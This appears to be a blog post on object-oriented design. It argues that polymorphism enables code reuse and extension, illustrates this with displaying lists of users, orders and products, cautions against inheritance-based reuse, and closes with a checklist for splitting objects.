Consider a system which manipulates three kinds of objects: Users, Orders, and Products. There’s already a system for displaying a list of users, and a distinct system for displaying a list of orders. To display a list of products, one cannot rely on the existing code, which is strongly tied to users and orders (respectively), so a third system is developed for displaying orders.

By contrast, an object-oriented program might consider that displaying lists merely involves having a way of drawing a single element, and repeating that operation for all the elements. So, there would be code to display a single user, code to display a single order, code to display a single product, and a single system which displays a list of things (whether these things are users, orders or products is irrelevant).

There’s a strong connection between code reuse and code extension: one cannot rely on reusing code that does exactly what is required, because it’s quite rare to require the exact same thing twice within a program. To reuse code on a larger scale, one has to extend what that code can do so that it becomes useful in the current context, and this extension can happen through polymorphism: divide your task in two parts, have one of the parts be made by a function or object that performs that task in many places (so that you reuse it) and have the other part be executed by an ad hoc small object.

Be very careful with inheritance as a way of performing reuse: this makes the code marginally easier to manipulate on the short term, but harder to extend on the long term.

Summary

The main benefits of object-oriented programming are reusing code and extending code, which in turn are merely facets of being able to write adaptable code that can be used in many situations. To achieve such code, use objects carefully:

  • Is any piece of this object’s functionality already present in another object? If it is, then that piece should be separated into its own function or object, leaving three small objects instead of two large ones.
  • Are the parameters to this function of the correct type, or could the function be made more versatile by using a more general interface?
  • Are these two pieces of functionality related, or are they just grouped there because of a subjective observation? If there is no reason for the two to work together, separate them so that everyone can use one but not the other.


693 feed subscribers
(readers who polled a feed this week)